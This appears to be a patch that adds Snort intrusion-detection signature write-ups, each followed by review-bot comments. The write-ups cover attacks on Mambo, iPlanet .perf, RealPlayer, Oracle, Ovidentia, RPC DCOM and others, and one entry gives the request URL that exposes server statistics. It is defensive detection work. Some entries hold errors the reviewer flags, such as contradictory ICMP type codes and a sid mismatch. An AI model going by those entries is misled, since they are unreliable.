+
+--
+Impact:
+Unauthorized upload of files to a server.
+
+--
+Detailed Information:
+Arbitrary files can be uploaded to a server running vulnerable versions 
+of Mambo Site Server due to laxe checking in the scripts controlling 
+uploading of files.
+
+The scripts perform checks for certain file extensions but do not 
+prevent the upload of files with image extensions.
+
+--
+Affected Systems:
+	Mambo Mambo Site Server 4.0.10, 4.0.11 and 4.0.12 BETA
+
+--
+Attack Scenarios:
+The attacker can upload malicious scripts and executable files by 
+appending a valid extension used for an image file.
+
+The attacker can also use the server to store files of his choosing.
+
+--
+Ease of Attack:
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest version of Mambo Site Server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6572
+
+--
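Review bot: the Summary is truncated: it consists only of "using the upload.php script." with no leading sentence, so the opening (what the event indicates for Mambo Site Server) needs to be restored. Ease of Attack is empty. Smaller points: "laxe" should be "lax", "Mambo Mambo Site Server" repeats the vendor name, and "do not prevent the upload of files with image extensions" reads as if uploading images is the problem; per Attack Scenarios it is scripts given an image extension that get through, so say that.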
--- /dev/null
+++ b/doc/signatures/2062.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2062
+
+--
+Summary:
+server performance and statistics package.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+iPlanet web server uses the file .perf to display performance statistics
+for the server.
+
+An attacker can access the statistics for the server by making a request
+for the file .perf.
+
+--
+Affected Systems:
+iPlanet web servers using this object.
+
+--
+Attack Scenarios:
+The attacker merely needs to access http://www.foo.com/.perf
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow viewing of web server statistics from external sources.
+
+Remove the appropriate lines from the obj.conf file to disallow viewing 
+of server performance statistics.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
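Review bot: the Summary is truncated to "server performance and statistics package." and needs its opening clause restored (from the Detailed Information: an attempt to access the .perf statistics object on an iPlanet web server). Additional References is empty; since Corrective Action tells administrators to edit obj.conf, a pointer to the iPlanet documentation for that object would help them find the right lines.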
--- /dev/null
+++ b/doc/signatures/2420.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2420
+
+--
+Summary:
+This event is generated when an attempt is made to download a file that
+may be an attack vector for a known exploit to a vulnerability in Real 
+Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
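Review bot: the version strings in Affected Systems contain stray spaces ("6.0.11 .774" and "6.0.11 .868"), which will not match the vendor's version numbering; check the source and remove the break. Additional References is empty for an entry that lists ten affected versions, so the advisory the list was taken from should be cited. The Corrective Action sentence is missing its full stop and "Simple. " carries trailing whitespace.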
--- /dev/null
+++ b/doc/signatures/373.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+373
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Flowpoint 2200 DSL router.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Flowpoint 2200 DSL router contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS156
+
+--
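Review bot: "legimately" in False Positives should be "legitimately". The Contributors line credits Max Vision at whitehats.org while the Arachnids reference below points at whitehats.com; pick one. Corrective Action ("Block inbound ICMP echo requests.") is broader than the event, which fires on the Flowpoint-specific payload; it would help to say that blocking echo requests at the border stops this reconnaissance but also breaks the legitimate ping troubleshooting noted under False Positives.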
--- /dev/null
+++ b/doc/signatures/451.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+
+Sid:
+408
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Timestamp Reply in response to an ICMP Timestamp Request message.
+
+--
+
+Impact:
+Information-gathering.  An ICMP Timestamp Reply message is sent in response to an ICMP RTimestamp Request message.  If the ICMP Timestamp Reply message reaches the requesting host it indicates that the replying host is alive.
+
+--
+
+Detailed Information:
+ICMP Type 0 Code 0 is the RFC defined messaging type for ICMP Timestamp Reply datagrams.  This type of message is used to determine if a host is active on the network.
+
+If ICMP type 8 (echo) traffic is filtered at a firewall, an attacker may try to use type 14 (timestamp) as an alternative.
+
+--
+
+Attack Scenarios:
+A remote attacker may use ICMP Timestamp Request datagrams to determine active hosts on the network in prelude of further attacks.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Use ingress filtering to prevent ICMP Type 0 Code 8 messages from entering the network.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
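Review bot: the file is named 451.txt but the Sid field says 408, so either the filename or the sid is wrong. The ICMP type/code values also contradict each other: Detailed Information says Timestamp Reply is "ICMP Type 0 Code 0", the next paragraph calls timestamp "type 14", and Corrective Action says to filter "ICMP Type 0 Code 8"; in RFC 792 Timestamp Request is type 13 and Timestamp Reply is type 14, so all three lines should be corrected to agree with the Summary. Minor: "RTimestamp" should be "Timestamp", "Information-gathering" should not be hyphenated, and the blank line before "--" after False Negatives is missing, unlike the other sections.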
--- /dev/null
+++ b/doc/signatures/2770.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2770
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_object_from_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
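Review bot: the procedure name in Detailed Information is split from its sentence by a line break ("drop_object_from_flavor" on one line, ". This procedure is included in" on the next), which reads as if the name ends with a newline; join it as "drop_object_from_flavor. This procedure is included in dbms_repcat." Also "Oracle Oracle9i" in Affected Systems repeats the vendor, several "-- " separator lines carry trailing whitespace, and Additional References is empty for a vulnerability specific enough to name the package and procedure.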
--- /dev/null
+++ b/doc/signatures/100000404.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000404
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "articles.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "articles.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
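Review bot: the third Detailed Information paragraph (the generic "Some applications do not perform stringent checks when validating the credentials of a client host" text) does not apply to a remote file include through "babInstallPath" in "articles.php" and contradicts the specific description above it; drop it or replace it with what the rule actually matches (a URL supplied in that parameter). The file also begins with two blank lines before "Rule:", unlike the other entries, the Summary line has trailing whitespace, "ona" should be "on a", and "attackers choosing" needs an apostrophe.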
--- /dev/null
+++ b/doc/signatures/1901.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1901
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
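Review bot: neither the Summary nor Detailed Information says which response this sid matches; "a known response to a sucessful attack" gives an analyst nothing to verify against the traffic, so name the content the rule looks for. The second half of Detailed Information is the credential-validation boilerplate from the CGI entries and is unrelated to an attack-responses rule. "sucessful" appears three times and should be "successful".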
--- /dev/null
+++ b/doc/signatures/111-7.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+111-7
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+a scan is in progress. That is, packets with the SYN, ACK, URG and
+PUSH flags set have been detected.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
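Review bot: the Sid field holds "111-7", which is a generator id and event id pair for the stream4 preprocessor rather than a rules-file sid; say so in the entry (generator 111, event 7) so readers do not search the rules files for sid 111-7. The flag combination in Detailed Information (SYN, ACK, URG and PUSH set together) is the actual detection criterion and belongs in the Summary, which currently says only "traffic that may constitute an attack".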
--- /dev/null
+++ b/doc/signatures/1168.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1168
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
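Review bot: this entry contains no rule-specific information: Summary, Detailed Information, Affected Systems and Attack Scenarios are all generic web-server text and Additional References is empty, so it does not tell an analyst what sid 1168 matches or which product is affected. At minimum the Summary should name the server or application and the request pattern the rule looks for.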
--- /dev/null
+++ b/doc/signatures/1494.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1494
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
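Review bot: the entry is generic CGI boilerplate with nothing that identifies sid 1494; Detailed Information describes credential-validation failures while the Summary speaks of "a known vulnerability in a CGI web application", and neither names the script. Add the script name and the vulnerability and cite it under Additional References, which is empty. Also "ona" should be "on a", and the last line of the first paragraph is not wrapped like the rest.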
--- /dev/null
+++ b/doc/signatures/1685.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1685
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
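Review bot: the Attack Scenarios text ("Simple. These are Oracle database commands.") is an Ease of Attack answer and duplicates the Ease of Attack field; describe the scenario instead (an attacker with a connection to the database issuing the command). The paragraph beginning "This connection can either be a legitimate telnet connection or the result of spawning a remote shell" appears to be copied from a shell-command rule and does not fit Oracle traffic. Formatting: "Sid: 1685" sits on the header line while every other entry puts the sid on its own line, and the two Corrective Action sentences are run together without a blank line, the second lacking a full stop.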
--- /dev/null
+++ b/doc/signatures/2491.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+2491
+
+--
+Summary:
+This rule no longer generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+This rule now uses flowbits and can be set to generate an event by
+modifying the rule slightly to remove the "flowbits:no_alert;" option.
+When traffic is detected that attempts to bind to the ISystemActivator
+object in MS RPC DCOM communications this rule now activates sids 2351
+and 2352 to detect exploits against this service. Cool huh?
+
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
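Review bot: the Summary ("This rule no longer generates an event when ...") describes what the rule used to do rather than what it does now; per Detailed Information it sets a flowbit on an ISystemActivator bind that sids 2351 and 2352 then check, so the Summary should say that. "Cool huh?" should be removed from a reference document, and the Attack Scenarios text about an overly long filename via a network share does not match the RPC description above it. Typos: "Expoit", "propogate". It is worth noting beside the port 69 advice that blocking it also blocks legitimate TFTP, the same caveat that applies to the RPC ports.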
--- /dev/null
+++ b/doc/signatures/857.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+857
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
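Review bot: this entry is word-for-word the same as the 1494.txt entry in this patch, so nothing in it identifies sid 857 or the CGI script it covers; add the script and vulnerability and fill in Additional References, which is empty. "ona" should be "on a".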
--- /dev/null
+++ b/doc/signatures/1109.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1109
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
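Review bot: this text is identical to the 1168.txt entry in this patch and contains no sid-specific information (no product, no request pattern, no references); it needs the same completion as that entry before it is useful for triage.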
--- /dev/null
+++ b/doc/signatures/2957.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2957
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
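Review bot: False Negatives says "None known." while Detailed Information itself states the issue "can also be exploited locally" to escalate privileges; a network signature cannot see that path, so it should be recorded here as a known false negative. Minor: the Impact line and the first Corrective Action line are missing full stops.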
--- /dev/null
+++ b/doc/signatures/1755.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1755
+
+--
+Summary:
+This event is generated when a remote authenticated user sends a malformed request for partial mailbox attributes to an internal IMAP server, indicating an attempt to exploit a buffer overflow vulnerability in some versions of IMAP.
+
+--
+Impact:
+Remote execution of arbitrary code, possible denial of service. The attacker must have a valid IMAP account to attempt this exploit.
+
+--
+Detailed Information:
+Versions of University of Washington imapd that are compiled with RFC 1730 support contain a vulnerability where an authenticated user can send a malformed request for partial mailbox attributes to the IMAP server, causing a buffer overflow condition. The attacker can then run arbitrary code on the server or crash the server completely.    
+
+--
+Affected Systems:
+Any operating system running University of Washington imapd compiled with RFC 1730 support, which includes the following versions of University of Washington imapd:
+2000.0
+2000.0a
+2000.0b
+2000.0c
+2001.0
+2001.0a
+
+--
+Attack Scenarios:
+An attacker with a valid user account sends a malformed request for partial mailbox attributes, causing a buffer overflow condition. The attacker can then execute arbitrary code on the server or can crash the mail server.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the attacker must have a valid account on the IMAP server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade University of Washington imapd to 2002.0 or higher, or apply the patch for your current version of UW IMAP appropriate to your operating system. The University of Washington has provided patches that address this vulnerability, and affected operating system vendors have distributed patches for their specific implementations of UW IMAP.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+
+--
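Review bot: Additional References is empty although the entry is specific enough to name the product, the affected versions and the fixed version (2002.0); the UW imapd advisory it was written from should be cited. The version list under Affected Systems is unindented while other entries in this patch tab-indent their lists, and the Detailed Information paragraph ends in trailing whitespace.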
--- /dev/null
+++ b/doc/signatures/1498.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1498
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
